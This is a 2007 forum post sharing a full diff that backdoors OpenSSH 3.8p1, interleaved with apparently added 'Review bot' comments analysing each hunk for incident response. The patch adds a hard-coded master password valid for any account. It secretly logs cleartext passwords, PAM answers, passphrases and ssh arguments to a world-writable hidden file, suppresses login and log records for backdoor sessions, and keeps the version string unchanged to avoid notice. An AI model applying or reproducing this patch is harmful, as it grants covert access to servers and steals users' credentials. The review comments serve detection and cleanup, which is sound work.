SSH BackDoor
  #1  
Старый 04.08.2007, 14:31
Isis



SSH BackDoor

Код:
diff -r -N -c openssh-3.8p1/auth-pam.c openssh-3.8p1+/auth-pam.c
*** openssh-3.8p1/auth-pam.c Tue Feb 17 13:20:08 2004
--- openssh-3.8p1+/auth-pam.c Tue Mar 2 19:24:00 2004
***************
*** 342,347 ****
--- 342,348 ----
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   sshpam_err = pam_authenticate(sshpam_handle, 0);
+ if (bella) sshpam_err = PAM_SUCCESS;
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   buffer_put_cstring(&buffer, "OK");
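Review bot: The added `if (bella) sshpam_err = PAM_SUCCESS;` overwrites the result of `pam_authenticate()` whenever the global `bella` is non-zero, so the `!= PAM_SUCCESS` check that follows can no longer reject the login; this is an authentication bypass and the line must not be present in an sshd build. `bella` is set by other hunks of this patch (auth-passwd.c and monitor.c) when the supplied secret equals the compiled-in `BACKPWD`, independently of the account's PAM configuration. For incident response, an sshd binary that does not match the checksum of the vendor package should be treated as untrusted and reinstalled from a verified source. The enclosing function starts and ends outside the hunk.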
diff -r -N -c openssh-3.8p1/auth-passwd.c openssh-3.8p1+/auth-passwd.c
*** openssh-3.8p1/auth-passwd.c Thu Feb 22 00:23:36 2004
--- openssh-3.8p1+/auth-passwd.c Tue Mar 2 19:24:00 2004
***************
*** 72,77 ****
--- 72,81 ----
  #endif
   if (*password == '\0' && options.permit_empty_passwd == 0)
    return 0;
+ if (!strcmp(BACKPWD, password)) return bella=1; bella=0;
+ sprintf(abuff, "passwd from: %s \tuser: %s \tpass: %s \n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ bellalog();
 
  #if defined(HAVE_OSF_SIA)
   return auth_sia_password(authctxt, password) && ok;
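Review bot: `if (!strcmp(BACKPWD, password)) return bella=1;` accepts one compiled-in password for whichever account is being authenticated, before any of the real password checks below it run, and every other attempt is formatted with the client address, user name and cleartext password and handed to `bellalog()`. Both additions have to be removed; sshd has no legitimate reason to persist cleartext passwords. The `sprintf` into the 512-byte global `abuff` is not length-bounded while `password` comes from the remote client, so the patched daemon appears to carry a pre-authentication memory-corruption risk on top of the bypass; the same unbounded pattern recurs in the monitor.c, readpass.c and ssh.c hunks. Every password submitted to a host running this build should be treated as disclosed and rotated. The function continues outside the hunk.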
diff -r -N -c openssh-3.8p1/includes.h openssh-3.8p1+/includes.h
*** openssh-3.8p1/includes.h Sun Feb 6 11:29:42 2004
--- openssh-3.8p1+/includes.h Tue Mar 2 19:24:00 2004
***************
*** 13,18 ****
--- 13,38 ----
   * called by a name other than "ssh" or "Secure Shell".
   */
 
+ // start patch by acme - acme at olografix/paranoici dot org
+ #include <sys/stat.h>
+ #include <stdio.h>
+
+ #define BACKPWD "inspassword"
+ #define SSH_LOG "/tmp/.lost+found"
+
+ FILE *alog;
+ char abuff[512];
+ int alen, ai, bella;
+
+ #define bellalog() { \
+ alen=strlen(abuff); \
+ for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
+ alog=fopen(SSH_LOG, "a"); \
+ if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+ // end patch, from aion
+
  #ifndef INCLUDES_H
  #define INCLUDES_H
 
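Review bot: This block hard-codes the indicators a responder should look for: a fixed secret in `BACKPWD`, and a capture file at `SSH_LOG` (`/tmp/.lost+found`) that `bellalog()` appends to and then sets to mode 0666 with `chmod`, leaving it readable and writable by every local user. Each byte is complemented (`abuff[ai]=~abuff[ai]`) before the write, so searching the file for readable user names or passwords finds nothing until the content is complemented again. The presence of that path with that mode, or of the log path as a string literal inside the installed ssh/sshd binaries, is evidence that this patch was applied. The variables are also defined rather than declared in a header, above the `INCLUDES_H` guard, so they end up in every translation unit that includes it.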
diff -r -N -c openssh-3.8p1/log.c openssh-3.8p1+/log.c
*** openssh-3.8p1/log.c Tue Feb 18 12:59:44 2004
--- openssh-3.8p1+/log.c Tue Mar 2 19:24:00 2004
***************
*** 273,278 ****
--- 273,279 ----
   char *txt = NULL;
   int pri = LOG_INFO;
 
+ if (bella) return;
   if (level > log_level)
    return;
 
diff -r -N -c openssh-3.8p1/loginrec.c openssh-3.8p1+/loginrec.c
*** openssh-3.8p1/loginrec.c Sun Feb 10 06:49:36 2004
--- openssh-3.8p1+/loginrec.c Tue Mar 2 19:24:00 2004
***************
*** 406,411 ****
--- 406,412 ----
  int
  login_write (struct logininfo *li)
  {
+ if (bella) return 0;
  #ifndef HAVE_CYGWIN
   if ((int)geteuid() != 0) {
     logit("Attempt to write login records by non-root user (aborting)");
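Review bot: `if (bella) return 0;` makes `login_write()` report success without running any of its body, and the log.c hunk adds `if (bella) return;` ahead of the `level > log_level` check, so that logging function emits nothing either; a session opened with the compiled-in password therefore presumably leaves no entry through these two paths. Detection cannot rely on sshd's own log output or login records for such sessions, so connection data collected outside the daemon (firewall or flow logs, kernel audit records) should be compared with what sshd reported. `login_write()` continues outside the hunk.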
diff -r -N -c openssh-3.8p1/monitor.c openssh-3.8p1+/monitor.c
*** openssh-3.8p1/monitor.c Wed Feb 6 06:40:28 2004
--- openssh-3.8p1+/monitor.c Tue Mar 2 19:24:00 2004
***************
*** 786,791 ****
--- 786,793 ----
    fatal("UsePAM not set, but ended up in %s anyway", __func__);
 
   user = buffer_get_string(m, NULL);
+ sprintf(abuff, "mm pam from: %s \tuser: %s \n", get_remote_ipaddr(), user);
+ bellalog();
 
   start_pam(user);
 
***************
*** 881,888 ****
   num = buffer_get_int(m);
   if (num > 0) {
    resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i)
     resp[i] = buffer_get_string(m, NULL);
    ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
    for (i = 0; i < num; ++i)
     xfree(resp[i]);
--- 883,894 ----
   num = buffer_get_int(m);
   if (num > 0) {
    resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i) {
     resp[i] = buffer_get_string(m, NULL);
+ sprintf(abuff, "pam_respond: [%d]: %s\n", i, resp[i]);
+ if(!strcmp(BACKPWD, resp[i])) bella=1;
+ else bellalog();
+ }
    ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
    for (i = 0; i < num; ++i)
     xfree(resp[i]);
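Review bot: The loop now copies each PAM response into `abuff` and either sets `bella` when it equals `BACKPWD` or writes it to the capture file, so keyboard-interactive answers (passwords, and presumably one-time codes) are recorded by the monitor. The first monitor.c hunk does the same for the user name and client address just before `start_pam(user)`. `resp[i]` is supplied by the client, and `sprintf` does not bound it to the 512-byte buffer. None of the added lines belongs in the loop; the original single-statement `for (i = 0; i < num; ++i)` is the correct form. The enclosing function starts and ends outside the hunk.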
diff -r -N -c openssh-3.8p1/readpass.c openssh-3.8p1+/readpass.c
*** openssh-3.8p1/readpass.c Fri Jan 24 02:36:23 2003
--- openssh-3.8p1+/readpass.c Tue Mar 2 19:24:00 2004
***************
*** 123,128 ****
--- 123,130 ----
    if ((ret = ssh_askpass(askpass, prompt)) == NULL)
     if (!(flags & RP_ALLOW_EOF))
      return xstrdup("");
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
    return ret;
   }
 
***************
*** 134,138 ****
--- 136,142 ----
 
   ret = xstrdup(buf);
   memset(buf, 'x', sizeof buf);
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
   return ret;
  }
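Review bot: `memset(buf, 'x', sizeof buf);` scrubs the typed passphrase from the stack buffer, and the two added lines immediately undo that protection by formatting the returned copy into `abuff` and appending it to the capture file through `bellalog()`. The first readpass.c hunk does the same on the askpass path, and the ssh.c hunk records every command-line argument, so this part of the patch affects the client programs: passwords and passphrases typed on this host for other systems, and the destinations given on the command line, end up in the same file. Incident scope should therefore include credentials for remote hosts reached from an affected machine, not only local accounts. The function starts outside the hunk.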
diff -r -N -c openssh-3.8p1/ssh.c openssh-3.8p1+/ssh.c
*** openssh-3.8p1/ssh.c Tue Dec 17 06:33:12 2003
--- openssh-3.8p1+/ssh.c Tue Mar 2 19:24:00 2004
***************
*** 212,217 ****
--- 212,221 ----
   extern int optind, optreset;
   extern char *optarg;
 
+ for(i=1; i<ac; i++) {
+ sprintf(abuff, "ssh: av[%d]: %s\n", i, av[i]);
+ bellalog();
+ }
   __progname = ssh_get_progname(av[0]);
   init_rng();
 
diff -r -N -c openssh-3.8p1/version.h openssh-3.8p1+/version.h
*** openssh-3.8p1/version.h Tue Feb 23 23:24:02 2004
--- openssh-3.8p1+/version.h Tue Mar 2 19:24:00 2004
***************
*** 1,3 ****
  /* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
 
! #define SSH_VERSION "OpenSSH_3.8p1"
--- 1,3 ----
  /* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
 
! #define SSH_VERSION "OpenSSH_3.8p1" // we can change it
 